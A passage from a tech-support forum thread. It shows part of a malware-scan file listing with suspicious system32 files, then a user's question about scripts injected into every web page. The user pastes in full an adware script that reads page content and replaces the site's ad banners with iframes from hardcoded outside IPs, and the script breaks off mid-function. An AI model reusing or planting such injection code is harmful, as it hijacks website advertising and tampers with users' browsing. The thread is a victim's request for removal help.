              ----a-w 23,308 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\WINAMPA.EXE-0536E33F.pf
              ----a-w 63,628 2008-03-17 18:47:53 C:\WINDOWS\Prefetch\WINRAR.EXE-39C6DAD9.pf
              ----a-w 116,878 2008-03-18 22:57:13 C:\WINDOWS\Prefetch\WINWORD.EXE-37F6AE09.pf
              ----a-w 94,472 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\WLLOGINPROXY.EXE-1781D844.pf
              ----a-w 27,186 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\WMIAPSRV.EXE-1E2270A5.pf
              ----a-w 35,338 2008-03-23 13:44:42 C:\WINDOWS\Prefetch\WMIPRVSE.EXE-28F301A9.pf
              ----a-w 14,594 2008-03-19 10:24:22 C:\WINDOWS\Prefetch\WSCNTFY.EXE-1B24F5EB.pf
              ----a-w 76,952 2008-03-23 13:35:02 C:\WINDOWS\Prefetch\WSFTPGUI.EXE-08424FB7.pf
              ----a-w 27,594 2008-03-23 14:25:32 C:\WINDOWS\Prefetch\WUAUCLT.EXE-399A8E72.pf
              ----a-w 60,418 2008-03-18 22:53:18 C:\WINDOWS\Prefetch\XOCR32B.EXE-07889382.pf
              ----a-w 110,524 2008-03-15 01:05:59 C:\WINDOWS\Prefetch\ZIPPER.EXE-1A280C86.pf
              ----a-w 26,910 2008-03-23 12:27:44 C:\WINDOWS\Prefetch\~CJQTJKJ.EXE-20A57D3F.pf
              ----a-w 479,766 2008-03-23 13:37:27 C:\WINDOWS\SoftwareDistribution\ReportingEvents.log
              ----a-w 45,096,960 2008-03-23 17:34:51 C:\WINDOWS\SoftwareDistribution\DataStore\DataStore.edb
              ----a-w 8,192 2008-03-23 17:34:51 C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.chk
              ----a-w 131,072 2008-03-23 17:34:51 C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log
              ----a-w 131,072 2008-03-21 09:31:49 C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb00232.log
              ----a-w 4 2008-03-23 12:43:19 C:\WINDOWS\SoftwareDistribution\Download\1641df03ac29cd5eb68d7361219d0d81\_downloadprogress_.state
              ----a-w 34 2008-03-23 12:44:29 C:\WINDOWS\SoftwareDistribution\Download\1641df03ac29cd5eb68d7361219d0d81\_unpacked_.state
              ----a-w 34 2008-03-23 12:44:44 C:\WINDOWS\SoftwareDistribution\Download\1641df03ac29cd5eb68d7361219d0d81\_usedelta_.state
              ----a-w 5,377,977 2008-03-18 06:54:47 C:\WINDOWS\SoftwareDistribution\Download\8e6e092285335035f6d1824355204800\EXCEL.CAB
              ----a-w 8 2008-03-10 15:54:14 C:\WINDOWS\SoftwareDistribution\EventCache\{01CC09DB-8675-4503-926D-5FDC6580AED5}.bin
              ----a-w 8 2008-03-23 12:41:18 C:\WINDOWS\SoftwareDistribution\EventCache\{66D89709-A5AC-4E7E-8C33-AA6D14E1581F}.bin
              ----a-w 8 2008-03-23 16:32:24 C:\WINDOWS\SoftwareDistribution\EventCache\{6C0E15FE-03EB-463B-BDEC-A11D48306037}.bin
              ----a-w 8 2008-03-15 10:26:14 C:\WINDOWS\SoftwareDistribution\EventCache\{83F951A6-28D0-4759-BC1A-CB556E3C1748}.bin
              ----a-w 25,384 2008-03-22 20:31:47 C:\WINDOWS\SoftwareDistribution\SelfUpdate\Default\wsus3setup.cab
              ----a-w 17,836 2008-03-22 20:31:48 C:\WINDOWS\SoftwareDistribution\SelfUpdate\Registered\musetup.cab
              --sha-w 184,313 2008-03-23 17:27:13 C:\WINDOWS\system32\hjllm.ini
              ----a-w 6,242 2008-03-15 01:06:14 C:\WINDOWS\system32\jupdate-1.6.0_05-b13.log
              ------w 271,872 2008-03-23 17:26:21 C:\WINDOWS\system32\mlljh.dll
              ----a-w 748,810 2008-03-21 00:09:26 C:\WINDOWS\system32\RVAXO.bat
              ----a-w 90,176 2008-03-23 11:49:01 C:\WINDOWS\system32\vlwosmpj.dll
              ----a-w 13,646 2008-03-23 12:39:52 C:\WINDOWS\system32\wpa.dbl
              ----a-w 71,907 2008-03-23 13:37:19 C:\WINDOWS\system32\CatRoot2\dberr.txt
              ----a-w 8,192 2008-03-23 17:34:12 C:\WINDOWS\system32\CatRoot2\edb.chk
              ----a-w 131,072 2008-03-23 17:29:51 C:\WINDOWS\system32\CatRoot2\edb.log
              ----a-w 1,056,768 2008-03-23 17:29:52 C:\WINDOWS\system32\CatRoot2\tmp.edb
              ----a-w 131,072 2008-03-23 17:27:19 C:\WINDOWS\system32\config\ACEEvent.evt
              ----a-w 524,288 2008-03-23 17:27:19 C:\WINDOWS\system32\config\AppEvent.Evt
              ---ha-w 1,024 2008-03-23 17:30:09 C:\WINDOWS\system32\config\default.LOG
              ---ha-w 1,024 2008-03-23 17:28:59 C:\WINDOWS\system32\config\SAM.LOG
              ----a-w 524,288 2008-03-23 17:27:19 C:\WINDOWS\system32\config\SecEvent.Evt
              ---ha-w 1,024 2008-03-23 17:29:59 C:\WINDOWS\system32\config\SECURITY.LOG
              ---ha-w 1,024 2008-03-23 17:51:59 C:\WINDOWS\system32\config\software.LOG
              ----a-w 524,288 2008-03-23 17:27:19 C:\WINDOWS\system32\config\SysEvent.Evt
              ---ha-w 1,024 2008-03-23 17:36:53 C:\WINDOWS\system32\config\system.LOG
              ----a-w 12,830 2008-03-23 17:36:36 C:\WINDOWS\system32\wbem\Logs\wbemess.log
              ----a-w 65,575 2008-03-23 16:32:24 C:\WINDOWS\system32\wbem\Logs\wbemess.lo_
              ----a-w 3,054 2008-03-23 17:27:29 C:\WINDOWS\system32\wbem\Logs\wbemprox.log
              ----a-w 3,627 2008-03-23 17:32:50 C:\WINDOWS\system32\wbem\Logs\wmiprov.log
              ----a-w 20 2008-03-23 17:28:50 C:\WINDOWS\system32\wbem\Repository\$WinMgmt.CFG
              ----a-w 1,327,104 2008-03-23 17:32:32 C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR
              ----a-w 672 2008-03-23 17:51:52 C:\WINDOWS\system32\wbem\Repository\FS\INDEX.MAP
              ----a-w 4 2008-03-23 17:51:53 C:\WINDOWS\system32\wbem\Repository\FS\MAPPING.VER
              ----a-w 5,016 2008-03-23 17:51:53 C:\WINDOWS\system32\wbem\Repository\FS\MAPPING1.MAP
              ----a-w 5,012 2008-03-23 17:41:23 C:\WINDOWS\system32\wbem\Repository\FS\MAPPING2.MAP
              ----a-w 8,839,168 2008-03-23 17:32:32 C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA
              ----a-w 4,344 2008-03-23 17:51:52 C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.MAP
              ----a-w 284 2008-03-21 06:46:00 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job
              ---ha-w 330 2008-03-23 17:31:50 C:\WINDOWS\Tasks\MP Scheduled Scan.job
              ---ha-w 6 2008-03-23 14:28:38 C:\WINDOWS\Tasks\SA.DAT
              ----a-w 77 2008-03-15 00:49:06 C:\WINDOWS\Temp\dw.log
              ----a-w 54,064 2008-03-23 17:48:54 C:\WINDOWS\Temp\MpCmdRun.log
              ----a-w 41,262 2008-03-21 00:50:53 C:\WINDOWS\Temp\MpSigStub.log
              ----a-w 66,426,832 2008-03-23 17:28:58 C:\WINDOWS\Temp\nvcbin.def.C2FC19B1.TMP

              Entries: 269 (259)
              Directories: 0 Files: 269
              Bytes: 168,948,604 Blocks: 330,089
              =============

              • #8
                New problem?

                When I open a website (in Internet Explorer or Firefox), two extra JavaScripts appear at the bottom of the source code, see below. Is this also related to the spam, and how can I get rid of it?

                <script type="text/javascript" language="javascript">


                onloadevent_E850A1B8F15A48e9BD405A67D067013E = window.onload;
                window.onload = f_E850A1B8F15A48e9BD405A67D067013E;

                TopWndUrl_E850A1B8F15A48e9BD405A67D067013E = "";
                MetaKwd_E850A1B8F15A48e9BD405A67D067013E = "";
                FrameString_E850A1B8F15A48e9BD405A67D067013E = "";

                EscUrl_24578457887 = escape(window.location.href);
                MainAid_24578457887 = '67608';
                MainGiud_24578457887 = '2494B670BBE74CFFA085DE5038EC5E4C';
                MainUid_24578457887 = '3B0A0F96DFD411DCBD04F67607DEFFFF';
                MainRid_24578457887 = 'radip';


                ruleset_AA532B7B55D44dbb87FAB30BCA27C538 = new Array();

                /*
                // example of the normal rule
                ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push( {"Name" : "NormalRuleName", "Global" : 0,
                "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl,
                "minCX" : 3, "maxCX" : 1000, "minCY" : 3, "maxCY" : 1000,
                "Image" : "http://ya.ru/logo.gif", "Click" : "http://www.ya.ru", "ReplaceAll" : 1};

                // example of the locale rule
                ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push( {"Name" : "LocaleRuleName", "Global" : 1,
                "minCX" : 3, "maxCX" : 1000, "minCY" : 3, "maxCY" : 1000,
                "Image" : "http://ya.ru/logo.gif", "Click" : "http://www.ya.ru", "ReplaceAll" : 1};
                */

                InitArray_24578457887 = new Array();

                //FrID, FrSrc, FrWidthMin, FrWidthMax, FrHeightMin, FrHeightMax, AHref, ImgSrc
                //InitArray_24578457887.push(
                // CreateInitObject_24578457887('aff78e03',
                // 'http://85.17.166.173/go/?cmp=nm_bm3s_728x90',
                // '728', '730', '90', '95'
                // 'http://85.12.43.83/www/delivery/ck.php?n=a8ac5ed4',
                // 'http://85.12.43.83/www/delivery/avw.php?zoneid=48&n=a8ac5ed4'));
                //InitArray.push

                var arrAnti = new Array("vlaze\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b728x90", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b728x90',
                'http://85.12.43.83/fls.all/728x90/728x90_27.html?a=b',
                '728', '728', '90', '90',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b720x300", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b720x300',
                'http://85.12.43.83/fls.all/720x300/720x300_1.html?a=b',
                '720', '720', '300', '300',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b468x60", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b468x60',
                'http://85.12.43.83/fls.all/468x60/468x60_11.html?a=b',
                '468', '468', '60', '60',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b336x280", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b336x280',
                'http://85.12.43.83/fls.all/336x280/336x280_3.html?a=b',
                '336', '336', '280', '280',
                '',
                ''));
                var arrAnti = new Array("vlaze\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b300x250", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b300x250',
                'http://85.12.43.83/fls.all/300x250/300x250_1.html?a=b',
                '300', '300', '250', '250',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b300x100", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b300x100',
                'http://85.12.43.83/fls.all/300x100/300x100_1.html?a=b',
                '300', '300', '100', '100',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b250x250", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b250x250',
                'http://85.12.43.83/fls.all/250x250/250x250_1.html?a=b',
                '250', '250', '250', '250',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b240x400", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b240x400',
                'http://85.12.43.83/fls.all/240x400/240x400_1.html?a=b',
                '240', '240', '400', '400',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b234x60", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b234x60',
                'http://85.12.43.83/fls.all/234x60/234x60_5.html?a=b',
                '234', '234', '60', '60',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b180x150", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b180x150',
                'http://85.12.43.83/fls.all/180x150/180x150_1.html?a=b',
                '180', '180', '150', '150',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b160x600", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b160x600',
                'http://85.12.43.83/fls.all/160x600/160x600_3.html?a=b',
                '160', '160', '600', '600',
                '',
                ''));
                var arrAnti = new Array("search42\.com","joybuyjoy\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b125x125", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b125x125',
                'http://85.12.43.83/fls.all/125x125/125x125_5.html?a=b',
                '125', '125', '125', '125',
                '',
                ''));
                var arrAnti = new Array("tube\.com","youporn\.com","sexthe\.net");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x90", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b120x90',
                'http://85.12.43.83/fls.all/120x90/120x90_19.html?a=b',
                '120', '120', '90', '90',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x600", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b120x600',
                'http://85.12.43.83/fls.all/120x600/120x600_12.html?a=b',
                '120', '120', '600', '600',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x240", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b120x240',
                'http://85.12.43.83/fls.all/120x240/120x240_1.html?a=b',
                '120', '120', '240', '240',
                '',
                ''));


                ExclusionArray_24578457887 = new Array();


                function f_E850A1B8F15A48e9BD405A67D067013E()
                {
                var MainCollection;

                window.onload = onloadevent_E850A1B8F15A48e9BD405A67D067013E; // reset onload event

                if (onloadevent_E850A1B8F15A48e9BD405A67D067013E != null)
                onloadevent_E850A1B8F15A48e9BD405A67D067013E();

                if (!document || !document.body || !document.body.childNodes)
                return;

                TopWndUrl_E850A1B8F15A48e9BD405A67D067013E = GetTopWindowUrl_C782A923BB0348e19544F09902515411();
                MetaKwd_E850A1B8F15A48e9BD405A67D067013E = GetMeta_C782A923BB0348e19544F09902515411();
                FrameString_E850A1B8F15A48e9BD405A67D067013E = GetFrameContent_C782A923BB0348e19544F09902515411(document.body);

                initialize_24578457887();
                if(MustExit_24578457887())
                return;

                MainCollection = document.body.childNodes;
                ReplaceByFrame_24578457887(InitArray_24578457887, MainCollection, 0);

                } //function f_E850A1B8F15A48e9BD405A67D067013E()


                function GetTopWindowUrl_C782A923BB0348e19544F09902515411()
                {
                var temp = "";
                var e;
                try
                {
                temp = window.top.location.href;
                }
                catch(e)
                {
                temp = window.location.href;
                }
                return temp;
                } //function GetTopWindowUrl_C782A923BB0348e19544F09902515411()


                function SimpleEncode_C782A923BB0348e19544F09902515411(str)
                {
                if (str == null)
                return "";

                str = escape(str);
                str = str.replace(/\+/g, "%2B");
                str = str.replace(/\//g, "%2F");

                return str;
                } //function SimpleEncode_C782A923BB0348e19544F09902515411(str)


                function GetMeta_C782A923BB0348e19544F09902515411()
                {
                var e;
                var str = "";
                try
                {
                var head = window.top.document.getElementsByTagName('head').item(0);
                if(head != null)
                {
                if (head.childNodes != null && head.childNodes.length > 0)
                {
                for(var y=head.childNodes.length-1; y>=0; y--)
                {
                var child = head.childNodes.item(y);
                if(child.tagName == "META")
                {
                str += "<META ";

                if(child.content != "" && child.name == "keywords")
                str += 'content="' + child.content + '" ';

                str += " >\n";
                }
                }
                }
                }
                }
                catch(e)
                {
                }

                str = SimpleEncode_C782A923BB0348e19544F09902515411(str);

                return str;
                } //function GetMeta_C782A923BB0348e19544F09902515411()


                function CheckUrl_3A315874118D436c8E256384792D2A73(rulesetElement)
                {
                var i;

                // check if it's locale matching
                if (rulesetElement.Global == 1)
                return "_";

                // check antikeywords
                for (i = 0; i < rulesetElement.AntiArr.length; i++)
                if (document.location.href.indexOf(rulesetElement.AntiArr[i]) != -1)
                return null;

                // check content keywords
                for (i = 0; i < rulesetElement.ContentArr.length; i++)
                if (FrameString_E850A1B8F15A48e9BD405A67D067013E.indexOf(rulesetElement.ContentArr[i]) != -1)
                return rulesetElement.ContentArr[i];

                // check metakeywords
                for (i = 0; i < rulesetElement.MetaArr.length; i++)
                if (MetaKwd_E850A1B8F15A48e9BD405A67D067013E.indexOf(rulesetElement.MetaArr[i]) != -1)
                return rulesetElement.MetaArr[i];

                // check urlkeywords
                for (i = 0; i < rulesetElement.UrlArr.length; i++)
                if (document.location.href.indexOf(rulesetElement.UrlArr[i]) != -1)
                return rulesetElement.UrlArr[i];

                return null;

                } //function CheckUrl_3A315874118D436c8E256384792D2A73(rulesetElement)



                function GetFrameContent_C782A923BB0348e19544F09902515411(nodeElement)
                {
                var retStr = "";

                if(null==nodeElement)
                return "";

                if (nodeElement.nodeValue != null)
                retStr = nodeElement.nodeValue;

                var allChildrenNode = nodeElement.childNodes;

                if (allChildrenNode != null && allChildrenNode.length > 0)
                {
                for(var y=allChildrenNode.length-1; y>=0; y--)
                {
                var child = allChildrenNode.item(y);

                retStr = retStr + GetFrameContent_C782A923BB0348e19544F09902515411(child);
                }
                }

                retStr = retStr + " ";
                return retStr;
                } //function GetFrameContent_C782A923BB0348e19544F09902515411(nodeElement)


                function Connection_3A315874118D436c8E256384792D2A73(Obj)
                {
                // var img = new Image();
                //
                // if(Obj)
                // img.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?" + Obj.FrID;
                // else
                // img.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?null";
                //alert('Connection ' + Obj.FrID + ' src: ' + Obj.FrSrc);
                try
                {
                var fr = document.createElement("iframe");
                fr.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?" + Obj.FrID;
                fr.width = 0;
                fr.height = 0;
                document.body.appendChild(fr);
                }
                catch(e){}


                } //function Connection_3A315874118D436c8E256384792D2A73()



                function MustExit_24578457887()
                {
                var flExcl = 0;
                var str;
                var aid = MainAid_24578457887;
                var ss;
                var i;

                flExcl = 0;
                str = window.location.href;
                for(i = 0; i < ExclusionArray_24578457887.length; ++i)
                {

                if(!ExclusionArray_24578457887[i].length)
                continue;

                if(str.length < ExclusionArray_24578457887[i].length)
                continue;

                if(str.substr(0, ExclusionArray_24578457887[i].length) == ExclusionArray_24578457887[i])
                {
                flExcl = 1;
                break;
                }

                }; //for(j = 0; j < ExclusionArray_24578457887.length; ++j)

                if(flExcl)
                return 1;

                flExcl = 0;
                for(i = 0; i < str.length - aid.length + 1; i++)
                {
                ss = str.substr(i, aid.length);
                if(ss == aid)
                {
                flExcl = 1;
                break;
                }
                } //for(j = 0; j < str.length - 4; j++)

                if(flExcl)
                return 1;

                return 0;

                }; //function MustExit()


                function initialize_24578457887()
                {
                var i;
                var str;

                for(i = 0; i < InitArray_24578457887.length; ++i)
                {
                str = GetDomain_24578457887(InitArray_24578457887[i].FrSrc);
                if(str.length)
                ExclusionArray_24578457887.push(str);

                str = GetDomain_24578457887(InitArray_24578457887[i].AHref);
                if(str.length)
                ExclusionArray_24578457887.push(str);

                str = GetDomain_24578457887(InitArray_24578457887[i].ImgSrc);
                if(str.length)
                ExclusionArray_24578457887.push(str);

                } //for(i = 0; i < InitArray_24578457887; ++i)

                } //function initialize()


                function CreateFrame_24578457887(InitObj)
                {
                var XFrame = document.createElement("iframe");
                XFrame.id = InitObj.FrID;
                XFrame.name = InitObj.FrName;
                XFrame.framespacing = InitObj.FrSpacing;
                XFrame.frameborder = InitObj.FrBorder;
                XFrame.scrolling = InitObj.FrScrolling ;
                XFrame.width = InitObj.FrWidthMin;
                XFrame.height = InitObj.FrHeightMin;

                if(!XFrame.frameborder || XFrame.frameborder == 'no')
                {
                XFrame.style.borderWidth = "0px";
                XFrame.frameBorder = '0';
                }

                return XFrame;

                } //function CreateFrame(El)

                function CheckImg_24578457887(ObjArray, El)
                {
                var i;

                try
                {

                for(i = 0; i < ObjArray.length; ++i)
                if(
                ( (El.width >= ObjArray[i].FrWidthMin) && (El.width <= ObjArray[i].FrWidthMax) ) &&
                ( (El.height >= ObjArray[i].FrHeightMin) && (El.height <= ObjArray[i].FrHeightMax) )
                )
                return ObjArray[i];

                }
                catch(e) {}

                return null;

                } //function CheckImg(El)


                function CheckObj_24578457887(ObjArray, El)
                {
                var i;

                try
                {
                for(i = 0; i < ObjArray.length; ++i)
                if(
                ( (El.getAttribute("width") >= ObjArray[i].FrWidthMin) && (El.getAttribute("width") <= ObjArray[i].FrWidthMax) ) &&
                ( (El.getAttribute("height") >= ObjArray[i].FrHeightMin) && (El.getAttribute("height") <= ObjArray[i].FrHeightMax) )
                )

                return ObjArray[i];
                }
                catch(e){}

                return null;

                } //function CheckObj(El)

                function CheckID_24578457887(ObjArray, El)
                {
                var i;

                try
                {
                if(El.id)
                for(i = 0; i < ObjArray.length; ++i)
                if(El.id == ObjArray[i].FrID)
                return ObjArray[i];
                }
                catch(e) {}

                return null;

                } //function CheckID_24578457887(ObjArray, El)


                function WrFrame_24578457887(InitObj)
                {
                var FrameList = null;
                var j;
                var xd, yd;

                FrameList = window.frames;
                for(j = 0; j < FrameList.length; ++j)
                {

                try
                {
                if(!FrameList[j].frameElement)
                continue;
                if(!FrameList[j].frameElement.id)
                continue;
                if(FrameList[j].frameElement.id != InitObj.FrID)
                continue;
                }
                catch(e)
                {
                continue;
                }

                try
                {
                FrameList[j].document.write("<html> <body id='B" + InitObj.FrID + "' name='B" + InitObj.FrID + "'> " +
                " <iframe id=" + InitObj.FrID + " name=" + InitObj.FrID +
                " src=" + InitObj.FrSrc +
                " framespacing=" + InitObj.FrSpacing + " frameborder=" + InitObj.FrBorder +
                " scrolling=" + InitObj.FrScrolling +
                " width=" + InitObj.FrWidthMin + " height=" + InitObj.FrHeightMin + "> " +
                " <a href=" + InitObj.AHref +
                " target=" + InitObj.ATarget +
                "><img flNotNeed=1 src=" + InitObj.ImgSrc +
                " border=" + InitObj.ImgBorder +
                " alt=" + InitObj.ImgAlt + " /> </a> </body> </iframe><html>");
                }
                catch(e)
                { continue; }

                try
                {
                xd = FrameList[j].document.getElementById('B' + InitObj.FrID).getAttribute("clientLeft") +
                FrameList[j].document.getElementById(InitObj.FrID).getAttribute("offsetLeft");

                yd = FrameList[j].document.getElementById('B' + InitObj.FrID).getAttribute("clientTop") +
                FrameList[j].document.getElementById(InitObj.FrID).getAttribute("offsetTop");

                if(navigator.appName == 'Microsoft Internet Explorer')
                {
                xd += 7;
                yd += 12;
                } //if(navigator.appName == 'Microsoft Internet Explorer')
                else if(navigator.appName == 'Netscape')
                {
                xd = '8';
                yd = '8'
                }//if(navigator.appName == 'Netscape')
                else if(navigator.appName == 'Opera')
                {
                xd = '5';
                yd = '5';
                } //else if(navigator.appName == 'Opera')

                }
                catch(e)
                {

                if(navigator.appName == 'Microsoft Internet Explorer')
                {
                xd = '8';
                yd = '14'
                }//if(navigator.appName == 'Microsoft Internet Explorer')
                if(navigator.appName == 'Netscape')
                {
                xd = '8';
                yd = '8'
                }//if(navigator.appName == 'Netscape')
                else if(navigator.appName == 'Opera')
                {
                xd = '5';
                yd = '5';

                }//else if(navigator.appName == 'Opera')
                }

                try
                {
                FrameList[j].document.getElementById('B' + InitObj.FrID).style.marginLeft= '-' + xd + 'px';
                FrameList[j].document.getElementById('B' + InitObj.FrID).style.marginTop= '-' + yd + 'px';
                }
                catch(e) {}

                } //for(j = 0; j < document.frames.length; ++j)

                } //function RepChild_24578457887()


                function CheckTagIMG_24578457887(El, InitArray)
                {
                var InitObj;
                var flExcl;
                var NewFrame;
                var i;

                if(El.parentNode.tagName != "A")
                return 0;

                InitObj = CheckImg_24578457887(InitArray, El);
                if(!InitObj)
                return 1;

                flExcl = 0;
                for(i = 0; i < ExclusionArray_24578457887.length; ++i)
                {
                if(!ExclusionArray_24578457887[i].length)
                continue;

                if(El.parentNode.href.length < ExclusionArray_24578457887[i].length)
                continue;

                if(El.parentNode.href.substr(0, ExclusionArray_24578457887[i].length) == ExclusionArray_24578457887[i])
                {
                flExcl = 1;
                break;
                }

                }; //for(j = 0; j < ExclusionArray_24578457887.length; ++j)

                if(flExcl)
                return 1;

                NewFrame = CreateFrame_24578457887(InitObj);
                El.parentNode.parentNode.replaceChild(NewFrame, El.parentNode);

                WrFrame_24578457887(InitObj);

                Connection_3A315874118D436c8E256384792D2A73(InitObj);

                return 0;

                } //function CheckTagIMG_24578457887()

                function CheckTagEMBED_24578457887(El, InitArray)
                {
                var str;
                var InitObj;
                var NewFrame;
                var i;

                if(El.parentNode == null)
                return 1;

                str = El.getAttribute("src");
                if(!str)
                return 1;

                for(i = 0; i < str.length - 3; ++i)
                {
                ss = str.substr(i, 4);
                if(ss == ".swf")
                break;
                } //for(j = 0; j < str.length - 4; j++)

                if(ss != ".swf")
                return 1;

                if(CheckID_24578457887(InitArray, El))
                return 1;
                InitObj = CheckObj_24578457887(InitArray, El);
                if(!InitObj)
                return 1;

                NewFrame = CreateFrame_24578457887(InitObj);
                El.parentNode.replaceChild(NewFrame, El);
                WrFrame_24578457887(InitObj);

                Connection_3A315874118D436c8E256384792D2A73(InitObj);

                return 0;

                } //function CheckTagEMBED_24578457887()


                function CheckTagOBJECT_24578457887(El, InitArray)
                {
                var str;
                var InitObj;
                var NewFrame;
                var ss;

                var i;

                if(El.parentNode == null)
                return 1;
                if(navigator.appName == 'Opera')
                return 1;


                try
                {
                str = El.getAttribute("movie");
                if(!str)
                {
                str = El.getAttribute("data");
                if(!str)
                return 1;
                } //if(!str)

                }
                catch(e)
                {
                return 1;
                }


                for(i = 0; i < str.length - 3; ++i)
                {
                ss = str.substr(i, 4);
                if(ss == ".swf")
                break;
                } //for(j = 0; j < str.length - 4; j++)

                if(ss != ".swf")
                return 1;

                if(CheckID_24578457887(InitArray, El))
                return 1;
                InitObj = CheckObj_24578457887(InitArray, El);
                if(!InitObj)
                return 1;

                NewFrame = CreateFrame_24578457887(InitObj);
